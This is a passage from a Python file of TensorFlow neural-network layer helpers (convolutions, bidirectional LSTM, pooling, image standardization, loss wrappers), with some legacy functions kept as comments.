bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(outputs, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
def sep_conv2d(inputs,
is_training,
kernel_size,
filters,
depth_multiplier,
strides=None,
activation=relu,
drop_rate=0.0,
initOpt=0,
biasInit=0.1,
padding='SAME',
name='sep_conv2d'):
with tf.compat.v1.variable_scope(name):
kernel_shape = [kernel_size[0], kernel_size[1], inputs.get_shape().as_list()[-1], filters]
if strides is None:
strides = [1, 1, 1, 1]
if initOpt == 0:
stddev1 = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + 1))
stddev2 = np.sqrt(2.0 / (kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev1 = 5e-2
stddev2 = 5e-2
if initOpt == 2:
stddev1 = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
stddev2 = min(np.sqrt(2.0 / (kernel_shape[2])), 5e-2)
kernel1 = tf.compat.v1.get_variable("weights_sep",
[kernel_shape[0], kernel_shape[1], kernel_shape[2], depth_multiplier],
initializer=tf.random_normal_initializer(stddev=stddev1))
kernel2 = tf.compat.v1.get_variable("weights_1x1", [1, 1, depth_multiplier * kernel_shape[2], kernel_shape[3]],
initializer=tf.random_normal_initializer(stddev=stddev2))
conv = tf.nn.separable_conv2d(inputs, depthwise_filter=kernel1, pointwise_filter=kernel2, strides=strides,
padding=padding, name="sep_conv")
bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
def dil_conv2d(inputs, is_training,
kernel_shape,
rate,
activation=relu,
drop_rate=0.0,
initOpt=0, biasInit=0.1, padding="SAME", name='dil_conv2d'):
"""Adds a 2-D convolutional layer given 4-D `inputs` and `kernel` with optional BatchNorm, LocalResponseNorm and Dropout.
Args:
scope_or_name: `string` or `VariableScope`, the scope to open.
inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
kernel: `4-D Tensor`, [kernel_height, kernel_width, in_channels, out_channels] kernel.
bias: `1-D Tensor`, [out_channels] bias.
rate: `int`, Dilation factor.
activation: activation function to be used (default: `relu`).
use_bn: `bool`, whether or not to include batch normalization in the layer.
is_training: `bool`, whether or not the layer is in training mode. This is only used if `use_bn` == True.
use_lrn: `bool`, whether or not to include local response normalization in the layer.
keep_prob: `double`, dropout keep prob.
dropout_maps: `bool`, If true whole maps are dropped or not, otherwise single elements.
padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
Returns:
`4-D Tensor`, has the same type `inputs`.
"""
with tf.compat.v1.variable_scope(name):
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
conv = tf.nn.atrous_conv2d(inputs, kernel, rate=rate, padding=padding)
bias = tf.compat.v1.get_variable("bias", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
def deconv2d(inputs, is_training, kernel_shape, out_shape, subS=2, activation=relu,
drop_rate=0.0,
initOpt=0, biasInit=0.1, name='deconv2d'):
with tf.compat.v1.variable_scope(name):
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
bias = tf.compat.v1.get_variable("bias", kernel_shape[2],
initializer=tf.constant_initializer(value=biasInit))
conv = tf.nn.conv2d_transpose(inputs, kernel, out_shape, strides=[1, subS, subS, 1], padding='SAME',
name='conv')
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if activation:
outputs = activation(outputs, name='activation')
if drop_rate > 0.0:
outputs = dropout(outputs, is_training=is_training, rate=drop_rate)
return outputs
# </editor-fold>
# <editor-fold desc="Recurrent Layer (b_rnn_layer)">
def b_rnn_layer(inputs,
is_training,
n_hidden,
seq_length=None,
use_cudnn=True,
time_major=True,
cell_type='LSTM',
name='b_rnn'):
"""
Bidirectional RNN layer. Input is assumed to be of form (dim0 x dim1 x FEATURES_IN) output is of form (dim0 x dim1 x FEATURES_OUT)
:param inputs:
:param is_training:
:param n_hidden:
:param seq_length:
:param use_cudnn:
:param time_major:
:param cell_type: 'LSTM' or 'GRU'
:param name:
:return:
"""
with tf.compat.v1.variable_scope(name):
if use_cudnn or not use_cudnn:
if not time_major:
print('Time major false not supported for variable sequence length.')
# forward direction
with tf.compat.v1.variable_scope("culstm_forward"):
# if cell_type == 'LSTM':
# curnn_fw = tf.keras.layers.lst(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# if cell_type == 'GRU':
# raise NotImplementedError
# # curnn_fw = CudnnGRU(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# curnn_fw.build(inputs.get_shape())
# outputs_fw, _ = curnn_fw(inputs, training=training)
culstm_fw = tf.keras.layers.LSTM(units=n_hidden, return_sequences=True)
culstm_fw.build(inputs.get_shape())
outputs_fw = culstm_fw(inputs, training=is_training)
# backward direction
with tf.compat.v1.variable_scope("culstm_backward"):
# if cell_type == 'LSTM':
# curnn_bw = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# if cell_type == 'GRU':
# raise NotImplementedError
# curnn_bw = CudnnGRU(num_layers=1, num_units=n_hidden, direction="unidirectional", dtype=tf.float32)
# curnn_bw.build(inputs.get_shape())
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = curnn_bw(reverse_inputs, training=training)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
culstm_bw = tf.keras.layers.LSTM(units=n_hidden, return_sequences=True)
culstm_bw.build(inputs.get_shape())
reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
outputs_bw = culstm_bw(reverse_inputs, training=is_training)
outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# concat
outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
else:
raise NotImplementedError("There is no else!")
# from tensorflow.python.ops.rnn import dynamic_rnn as rnn
# if cell_type == 'LSTM':
# single_cell = lambda: LSTMCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# if cell_type == 'GRU':
# single_cell = lambda: GRUCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# # forward direction
# with tf.compat.v1.variable_scope("culstm_forward"):
# cell_fw = MultiRNNCell([single_cell() for _ in range(1)])
# outputs_fw, _ = rnn(cell_fw, inputs, dtype=tf.float32, time_major=True)
# # backward direction
# with tf.compat.v1.variable_scope("culstm_backward"):
# cell_bw = MultiRNNCell([single_cell() for _ in range(1)])
# reverse_inputs = tf.reverse_sequence(inputs, seq_length, batch_axis=1, seq_axis=0)
# outputs_bw, _ = rnn(cell_bw, reverse_inputs, dtype=tf.float32, time_major=True)
# outputs_bw = tf.reverse_sequence(outputs_bw, seq_length, batch_axis=1, seq_axis=0)
# # concat
# outputs = tf.concat([outputs_fw, outputs_bw], axis=2)
return outputs
# TODO Check this. Is CuDNN v3 not working???? Version depends on seq_length and time_major...
# with tf.compat.v1.variable_scope(name):
# if use_cudnn:
# # if not time_major:
# # print('Time major false not supported for variable sequence length.')
# if cell_type == 'LSTM':
# curnn = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="bidirectional", dtype=tf.float32)
# if cell_type == 'GRU':
# curnn = CudnnGRU(num_layers=1, num_units=n_hidden, direction="bidirectional", dtype=tf.float32)
# curnn.build(inputs.get_shape())
# # outputs, _ = curnn(inputs, training=training, sequence_lengths=seq_length, time_major=time_major)
# outputs, _ = curnn(inputs, training=training, time_major=time_major, sequence_lengths=seq_length)
# # culstm_fw = tf.keras.layers.CuDNNLSTM(units=n_hidden, return_sequences=True)
# # culstm_fw.build(inputs.get_shape())
# # outputs_fw = culstm_fw(inputs, training=training)
# else:
# if cell_type == 'LSTM':
# single_cell = lambda: LSTMCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# if cell_type == 'GRU':
# single_cell = lambda: GRUCell(n_hidden, reuse=tf.compat.v1.get_variable_scope().reuse)
# cells_fw = [single_cell() for _ in range(1)]
# cells_bw = [single_cell() for _ in range(1)]
# outputs, _, _ = stack_bidirectional_dynamic_rnn(cells_fw, cells_bw, inputs, dtype=tf.float32,
# sequence_length=seq_length,
# time_major=time_major)
# return outputs
def MultiRNNCell(cells, state_is_tuple=True):
return tf.nn.rnn_cell.MultiRNNCell(cells, state_is_tuple=state_is_tuple)
# def LSTMCell(num_units, reuse=None):
# return CudnnCompatibleLSTMCell(num_units=num_units, reuse=reuse)
#
#
# def GRUCell(num_units, reuse=None):
# return CudnnCompatibleGRUCell(num_units=num_units, reuse=reuse)
def DropoutWrapper(cell, input_keep_prob=1.0, output_keep_prob=1.0, state_keep_prob=1.0):
return tf.compat.v1.nn.rnn_cell.DropoutWrapper(cell, input_keep_prob=input_keep_prob,
output_keep_prob=output_keep_prob,
state_keep_prob=state_keep_prob)
# </editor-fold>
# </editor-fold>
# <editor-fold desc="NOT Trainable Layers (dropout, avg_pool1d, avg_pool2d, max_pool1d, max_pool2d, embedding_lookup, moments, top_k, conv_to_rnn, brnn_direction_merge_sum, brnn_direction_merge_sum_to_conv, normalize, upsample_simple, per_image_standardization)">
def dropout(inputs, is_training, rate=None, keep_prob=None, noise_shape=None, name="dropout", keras_model=None):
if rate and keep_prob:
print("ERROR: Use either keep_prob or rate for dropout! ")
exit(1)
if not keras_model._built and name not in keras_model._tracked_layers:
keras_model._tracked_layers[name] = tf.keras.layers.Dropout(inputs, rate=rate, noise_shape=noise_shape,
name=name)
# if keep_prob:
# rate = 1.0 - keep_prob
if is_training:
return keras_model._tracked_layers[name](inputs)
else:
return inputs
def avg_pool1d(inputs,
kernel_width,
stride_width,
padding='SAME',
name="avg_pool1d"):
with tf.compat.v1.variable_scope(name):
inputs = tf.expand_dims(inputs, axis=1)
outputs = avg_pool2d(inputs, ksize=[1, 1, kernel_width, 1], strides=[1, 1, stride_width, 1],
padding=padding)
outputs = tf.squeeze(outputs, axis=1)
return outputs
def avg_pool2d(inputs, ksize, strides, padding, name='avg_pool2d'):
return tf.nn.avg_pool2d(inputs, ksize=ksize, strides=strides, padding=padding, name=name)
def max_pool1d(inputs,
kernel_width,
stride_width,
padding='SAME',
name="max_pool1d"):
with tf.compat.v1.variable_scope(name):
inputs = tf.expand_dims(inputs, axis=1)
outputs = max_pool2d(inputs, ksize=[1, 1, kernel_width, 1], strides=[1, 1, stride_width, 1],
padding=padding)
outputs = tf.squeeze(outputs, axis=1)
return outputs
def max_pool2d(inputs, ksize, strides, padding, name='max_pool2d'):
return tf.nn.max_pool2d(inputs, ksize=ksize, strides=strides, padding=padding, name=name)
def embedding_lookup(params,
ids,
partition_strategy="mod",
name=None,
validate_indices=True, # pylint: disable=unused-argument
max_norm=None):
return tf.nn.embedding_lookup(params, ids, partition_strategy=partition_strategy, name=name,
validate_indices=validate_indices, max_norm=max_norm)
def moments(x, axes, shift=None, name=None, keep_dims=None, keepdims=None):
return tf.nn.moments(x,
axes,
shift=shift, # pylint: disable=unused-argument
name=name,
keep_dims=keep_dims,
keepdims=keepdims)
def top_k(input, k=1, sorted=True, name=None):
return tf.nn.top_k(input, k=k, sorted=sorted, name=name)
def conv_to_rnn(conv_out, time_major=True, data_format='NHWC', name='conv_to_rnn'):
"""
Adds a utility layer to transform the output Tensor of a convolutional layer into a Tensor which fits a RNN.
This function assumes that `time_major` fits time major of RNN.
Args:
conv_out: `4-D Tensor`, the output of a convolutional layer with its shaped determined by `data_format`:
For 'NHWC' it is assumed that `conv_out` is stored in the order of `[batch_size, Y, X, Z]`.
For 'NCHW' it is assumed that `conv_out` is stored in the order of `[batch_size, Z, Y, X]`.
time_major: `bool` [batch_size, time, depth] vs [time, batch_size, depth].
data_format: `str` from ('NHWC', 'NCHW'), specifies the data format of `conv_out`.
name: `str` or `VariableScope`, the scope to open.
Returns:
`3-D Tensor`, the transformed `conv_out` Tensor with shape `[X, batch_size, Y * Z]` corresponds to
`[max_time, batch_size, cell_size]` for time_major=True.
"""
with tf.compat.v1.variable_scope(name):
if data_format == 'NCHW':
if time_major:
# (batch_size, Z, Y, X) -> (X, batch_size, Y, Z)
rnn_in = tf.transpose(conv_out, [3, 0, 2, 1])
else:
# (batch_size, Z, Y, X) -> (batch_size, X, Y, Z)
rnn_in = tf.transpose(conv_out, [0, 3, 2, 1])
else:
if time_major:
# (batch_size, Y, X, Z) -> (X, batch_size, Y, Z)
rnn_in = tf.transpose(conv_out, [2, 0, 1, 3])
else:
# (batch_size, Y, X, Z) -> (batch_size, X, Y, Z)
rnn_in = tf.transpose(conv_out, [0, 2, 1, 3])
shape_static = rnn_in.get_shape().as_list()
y = shape_static[2]
z = shape_static[3]
shape_dynamic = tf.shape(rnn_in)
dim0 = shape_dynamic[0]
dim1 = shape_dynamic[1]
# (dim0, dim1, Y, Z) -> (dim0, dim1, Y*Z)
rnn_in = tf.reshape(rnn_in, [dim0, dim1, y * z])
# (X, batch_size, Y*Z) corresponds to [max_time, batch_size, cell_size]
return rnn_in
def brnn_direction_merge_sum(rnn_out, time_major_in=True, time_major_out=True, name='brnn_merge_sum'):
"""
Adds a utility layer to transform the output Tensor pair of a bidirectional dynamic RNN into a 3D Tensor,
which sums the both RNN directions
"""
with tf.compat.v1.variable_scope(name):
shape_static = rnn_out.get_shape().as_list()
cell_size = shape_static[2] // 2
shape_dynamic = tf.shape(rnn_out)
dim0 = shape_dynamic[0]
dim1 = shape_dynamic[1]
# [dim0, dim1, 2*cell_size] -> [dim0, dim1, 2, cell_size]
graph_o = tf.reshape(rnn_out, shape=[dim0, dim1, 2, cell_size])
# [dim0, dim1, 2, cell_size] -> [dim0, dim1, cell_size]
graph_o = tf.reduce_sum(graph_o, axis=2)
if time_major_in and time_major_out:
return graph_o
else:
# Since time_major_in != time_major_out we flip the first two dimensions
return tf.transpose(graph_o, [1, 0, 2])
def brnn_direction_merge_sum_to_conv(rnn_out, time_major_in=True, data_format='NHWC', name='brnn_merge_sum_to_conv'):
with tf.compat.v1.variable_scope(name):
# [] -> [batch_size, max_time, cell_size]
output = brnn_direction_merge_sum(rnn_out, time_major_in, time_major_out=False)
# [batch_size, max_time, cell_size] -> [batch_size, cell_size, max_time]
output = tf.transpose(output, [0, 2, 1])
if data_format == 'NHWC':
# [batch_size, cell_size, max_time] -> [batch_size, cell_size, max_time, 1]
return tf.expand_dims(output, axis=3)
# [batch_size, cell_size, max_time, 1] corresponds to [batch_size, Y, X, Z], 'NHWC'
else:
# [batch_size, cell_size, max_time] -> [batch_size, 1, cell_size, max_time]
return tf.expand_dims(output, axis=1)
# [batch_size, 1, cell_size, max_time] corresponds to [batch_size, Z, Y, X], 'NCHW'
def normalize(image, img_length):
# dynamic shape values (calculated during runtime)
shape_dynamic = tf.shape(image)
# static shape values (defined up-front)
shape_static = image.get_shape().as_list()
# image normalization
image_crop = tf.image.crop_to_bounding_box(image, 0, 0, shape_static[0], img_length)
# image_norm = tf.image.per_image_standardization(image_crop)
image_norm = per_image_standardization(image_crop)
# TODO test this
# image_norm = 1.0 - image_norm
image_pad = tf.image.pad_to_bounding_box(image_norm, 0, 0, shape_static[0], shape_dynamic[1])
# image_pad = 1.0 - image_pad
return image_pad
@tf_export('image.per_image_standardization')
def per_image_standardization(image):
"""Linearly scales `image` to have zero mean and unit norm.
This op computes `(x - mean) / adjusted_stddev`, where `mean` is the average
of all values in image, and
`adjusted_stddev = max(stddev, 1.0/sqrt(image.NumElements()))`.
`stddev` is the standard deviation of all values in `image`. It is capped
away from zero to protect against division by 0 when handling uniform images.
Args:
image: 3-D tensor of shape `[height, width, channels]`.
Returns:
The standardized image with same shape as `image`.
Raises:
ValueError: if the shape of 'image' is incompatible with this function.
"""
with tf.compat.v1.name_scope(None, 'per_image_standardization', [image]) as scope:
image = tf.convert_to_tensor(image, name='image')
# image = _Assert3DImage(image)
# num_pixels = math_ops.reduce_prod(array_ops.shape(image))
# image = math_ops.cast(image, dtype=dtypes.float32)
image_mean = tf.math.reduce_mean(image)
variance = (
tf.math.reduce_mean(tf.math.square(image)) -
tf.math.square(image_mean))
variance = relu(variance)
stddev = tf.math.sqrt(variance)
# Apply a minimum normalization that protects us against uniform images.
# min_stddev = math_ops.rsqrt(1.0 * num_pixels)
pixel_value_scale = tf.math.maximum(stddev, 0.0001)
pixel_value_offset = image_mean
image = tf.math.subtract(image, pixel_value_offset)
image = tf.math.divide(image, pixel_value_scale, name=scope)
# image = math_ops.div(image, pixel_value_scale, name=scope)
return image
def upsample_simple(images, shape_out, up, numClasses):
filter_up = tf.constant(1.0, shape=[up, up, numClasses, numClasses])
return tf.nn.conv2d_transpose(images, filter_up,
output_shape=shape_out,
strides=[1, up, up, 1])
# </editor-fold>
# <editor-fold desc="Loss Utilities (softmax_cross_entropy_with_logits_v2, sparse_softmax_cross_entropy_with_logits, sigmoid_cross_entropy_with_logits, l2_loss, nce_loss)">
def softmax_cross_entropy_with_logits_v2(labels, logits, axis=None, name=None, dim=None):
return tf.nn.softmax_cross_entropy_with_logits_v2(labels, logits, axis=axis, name=name, dim=dim)
def sparse_softmax_cross_entropy_with_logits(labels=None, logits=None, name=None, _sentinel=None):
return tf.nn.sparse_softmax_cross_entropy_with_logits(labels=labels, logits=logits, name=name, _sentinel=_sentinel)
def sigmoid_cross_entropy_with_logits(labels=None, logits=None, name=None, _sentinel=None):
return tf.nn.sigmoid_cross_entropy_with_logits(_sentinel=_sentinel, labels=labels, logits=logits, name=name)
def l2_loss(t, name=None):
return tf.nn.l2_loss(t, name=name)
def nce_loss(weights, biases, labels, inputs, num_sampled, num_classes,
num_true=1,
sampled_values=None,
remove_accidental_hits=False,
partition_strategy="mod",
name="nce_loss"):
return tf.nn.nce_loss(weights,
biases,
labels,
inputs,
num_sampled,
num_classes,
num_true=num_true,
sampled_values=sampled_values,
remove_accidental_hits=remove_accidental_hits,
partition_strategy=partition_strategy,
name=name)
# </editor-fold>
# <editor-fold desc="Utilities (conv1d_op, conv2d_op)">
def conv1d_op(value=None,
filters=None,
stride=None,
padding=None,
use_cudnn_on_gpu=None,
data_format=None,
name=None,
input=None, # pylint: disable=redefined-builtin
dilations=None):
return tf.nn.conv1d(value=value,
filters=filters,
stride=stride,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format,
name=name,
input=input,
dilations=dilations)
def conv2d_op(input,
filter=None,
strides=None,
padding=None,
use_cudnn_on_gpu=True,
data_format="NHWC",
dilations=[1, 1, 1, 1],
name=None):
return tf.compat.v1.nn.conv2d(input,
filter=filter,
strides=strides,
padding=padding,
use_cudnn_on_gpu=use_cudnn_on_gpu,
data_format=data_format,
dilations=dilations,
name=name)
# </editor-fold>
# <editor-fold desc="Backup (old stuff we do not want to delete yet)">
def conv2d_bn_lrn_drop(inputs,
kernel_shape,
is_training,
strides=None,
activation=relu,
use_bn=False,
renorm=False,
use_mvn=False,
use_lrn=False,
keep_prob=1.0,
dropout_maps=False,
initOpt=0,
biasInit=0.1,
padding='SAME',
name="conv2d"):
"""Adds a 2-D convolutional layer given 4-D `inputs` and `kernel` with optional BatchNorm, LocalResponseNorm and Dropout.
Args:
scope_or_name: `string` or `VariableScope`, the scope to open.
inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
kernel: `4-D Tensor`, [kernel_height, kernel_width, in_channels, out_channels] kernel.
bias: `1-D Tensor`, [out_channels] bias.
strides: list of `ints`, length 4, the stride of the sliding window for each dimension of `inputs`.
activation: activation function to be used (default: `relu`).
use_bn: `bool`, whether or not to include batch normalization in the layer.
is_training: `bool`, whether or not the layer is in training mode. This is only used if `use_bn` == True.
use_lrn: `bool`, whether or not to include local response normalization in the layer.
keep_prob: `double`, dropout keep prob.
dropout_maps: `bool`, If true whole maps are dropped or not, otherwise single elements.
padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
Returns:
`4-D Tensor`, has the same type `inputs`.
"""
with tf.compat.v1.variable_scope(name):
if strides is None:
strides = [1, 1, 1, 1]
stddev = 5e-2
if initOpt == 0:
stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
if initOpt == 1:
stddev = 5e-2
if initOpt == 2:
stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
initializer = tf.random_normal_initializer(stddev=stddev)
if initOpt < 0:
initializer = tf.random.truncated_normal_initializer(0.0, -initOpt)
kernel = tf.compat.v1.get_variable("weights", kernel_shape,
initializer=initializer)
conv = conv2d_op(inputs, kernel, strides, padding=padding, name='conv')
bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
initializer=tf.constant_initializer(value=biasInit))
outputs = tf.nn.bias_add(conv, bias, name='preActivation')
if use_bn:
print("WARNING BATCH NORM is deprcated")
raise AttributeError
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, renorm=renorm,
# scope="batchNorm")
if use_mvn:
outputs = feat_norm(outputs, kernel_shape[3])
if activation:
outputs = activation(outputs, name='activation')
if use_lrn:
outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
if is_training:
if dropout_maps:
conv_shape = tf.shape(outputs)
n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
outputs = dropout(outputs, keep_prob=keep_prob, noise_shape=n_shape)
else:
outputs = dropout(outputs, keep_prob=keep_prob, is_training=is_training)
return outputs
# def sep_conv2d_bn_lrn_drop(scope_or_name,
# inputs,
# kernel_shape,
# depth_multiplier,
# training,
# strides=None,
# activation=relu,
# use_bn=False,
# renorm=False,
# use_mvn=False,
# use_lrn=False,
# keep_prob=1.0,
# dropout_maps=False,
# initOpt=0,
# biasInit=0.1,
# padding='SAME'):
# if strides is None:
# strides = [1, 1, 1, 1]
# with tf.compat.v1.variable_scope(scope_or_name):
# if initOpt == 0:
# stddev1 = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + 1))
# stddev2 = np.sqrt(2.0 / (kernel_shape[2] + kernel_shape[3]))
# if initOpt == 1:
# stddev1 = 5e-2
# stddev2 = 5e-2
# if initOpt == 2:
# stddev1 = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
# stddev2 = min(np.sqrt(2.0 / (kernel_shape[2])), 5e-2)
# kernel1 = tf.compat.v1.get_variable("weights_sep", [kernel_shape[0], kernel_shape[1], kernel_shape[2], depth_multiplier],
# initializer=tf.random_normal_initializer(stddev=stddev1))
# kernel2 = tf.compat.v1.get_variable("weights_1x1", [1, 1, depth_multiplier*kernel_shape[2], kernel_shape[3]],
# initializer=tf.random_normal_initializer(stddev=stddev2))
#
# conv = tf.nn.separable_conv2d(inputs, depthwise_filter=kernel1, pointwise_filter=kernel2, strides=strides,
# padding=padding, name="sep_conv")
# bias = tf.compat.v1.get_variable("biases", kernel_shape[3],
# initializer=tf.constant_initializer(value=biasInit))
# outputs = tf.nn.bias_add(conv, bias, name='preActivation')
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, renorm=renorm,
# scope="batchNorm")
# if use_mvn:
# outputs = feat_norm(outputs, kernel_shape[3])
# if activation:
# outputs = activation(outputs, name='activation')
# if use_lrn:
# outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
# if training:
# if dropout_maps:
# conv_shape = tf.shape(outputs)
# n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
# outputs = dropout(outputs, keep_prob=keep_prob, noise_shape=n_shape)
# else:
# outputs = dropout(outputs, keep_prob=keep_prob)
# return outputs
# def dil_conv2d_bn_lrn_drop(scope_or_name,
# inputs,
# kernel_shape,
# rate,
# training,
# activation=relu,
# use_bn=False,
# use_mvn=False,
# use_lrn=True,
# keep_prob=1.0,
# dropout_maps=False,
# initOpt=0, padding="SAME"):
# """Adds a 2-D convolutional layer given 4-D `inputs` and `kernel` with optional BatchNorm, LocalResponseNorm and Dropout.
#
# Args:
# scope_or_name: `string` or `VariableScope`, the scope to open.
# inputs: `4-D Tensor`, it is assumed that `inputs` is shaped `[batch_size, Y, X, Z]`.
# kernel: `4-D Tensor`, [kernel_height, kernel_width, in_channels, out_channels] kernel.
# bias: `1-D Tensor`, [out_channels] bias.
# rate: `int`, Dilation factor.
# activation: activation function to be used (default: `relu`).
# use_bn: `bool`, whether or not to include batch normalization in the layer.
# training: `bool`, whether or not the layer is in training mode. This is only used if `use_bn` == True.
# use_lrn: `bool`, whether or not to include local response normalization in the layer.
# keep_prob: `double`, dropout keep prob.
# dropout_maps: `bool`, If true whole maps are dropped or not, otherwise single elements.
# padding: `string` from 'SAME', 'VALID'. The type of padding algorithm used in the convolution.
#
# Returns:
# `4-D Tensor`, has the same type `inputs`.
# """
# with tf.compat.v1.variable_scope(scope_or_name):
# if initOpt == 0:
# stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
# if initOpt == 1:
# stddev = 5e-2
# if initOpt == 2:
# stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
# kernel = tf.compat.v1.get_variable("weights", kernel_shape,
# initializer=tf.random_normal_initializer(stddev=stddev))
# conv = tf.nn.atrous_conv2d(inputs, kernel, rate=rate, padding=padding)
# bias = tf.compat.v1.get_variable("bias", kernel_shape[3],
# initializer=tf.constant_initializer(value=0.1))
# outputs = tf.nn.bias_add(conv, bias, name='preActivation')
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, scope="batchNorm")
# if use_mvn:
# outputs = feat_norm(outputs, kernel_shape[3])
# if activation:
# outputs = activation(outputs, name='activation')
# if use_lrn:
# outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
# if training:
# if dropout_maps:
# conv_shape = tf.shape(outputs)
# n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
# outputs = dropout(outputs, keep_prob=keep_prob, noise_shape=n_shape)
# else:
# outputs = dropout(outputs, keep_prob=keep_prob)
# return outputs
# def deconv2d_bn_lrn_drop(scope_or_name, inputs, kernel_shape, out_shape, training, subS=2, activation=relu,
# use_bn=False,
# use_mvn=False,
# use_lrn=False,
# keep_prob=1.0,
# dropout_maps=False,
# initOpt=0):
# with tf.compat.v1.variable_scope(scope_or_name):
# if initOpt == 0:
# stddev = np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2] + kernel_shape[3]))
# if initOpt == 1:
# stddev = 5e-2
# if initOpt == 2:
# stddev = min(np.sqrt(2.0 / (kernel_shape[0] * kernel_shape[1] * kernel_shape[2])), 5e-2)
# kernel = tf.compat.v1.get_variable("weights", kernel_shape,
# initializer=tf.random_normal_initializer(stddev=stddev))
# bias = tf.compat.v1.get_variable("bias", kernel_shape[2],
# initializer=tf.constant_initializer(value=0.1))
# conv = tf.nn.conv2d_transpose(inputs, kernel, out_shape, strides=[1, subS, subS, 1], padding='SAME',
# name='conv')
# outputs = tf.nn.bias_add(conv, bias, name='preActivation')
# if use_bn:
# outputs = batch_norm(outputs, training=training, scale=True, fused=True, scope="batchNorm")
# if use_mvn:
# outputs = feat_norm(outputs, kernel_shape[3])
# if activation:
# outputs = activation(outputs, name='activation')
# if use_lrn:
# outputs = tf.nn.local_response_normalization(outputs, name='localResponseNorm')
# if training:
# if dropout_maps:
# conv_shape = tf.shape(outputs)
# n_shape = tf.stack([conv_shape[0], 1, 1, conv_shape[3]])
# outputs = dropout(outputs, keep_prob=keep_prob, noise_shape=n_shape)
# else:
# outputs = dropout(outputs, keep_prob=keep_prob)
# return outputs
# def cublstm_fix(scope_or_name,
# inputs,
# seq_length,
# n_hidden,
# training,
# use_bn=False,
# use_gpu=True, ):
# with tf.compat.v1.variable_scope(scope_or_name):
# if use_gpu:
# # forward direction
# with tf.compat.v1.variable_scope("culstm_forward"):
# culstm_fw = CudnnLSTM(num_layers=1, num_units=n_hidden, direction="unidirectional",
# dtype=tf.float32)
# culstm_fw.build(inputs.get_shape())
# outputs_fw, _ = culstm_fw(inputs, training=True)
# # culstm_fw = tf.keras.layers.CuDNNLSTM(units=n_hidden, return_sequences=True)
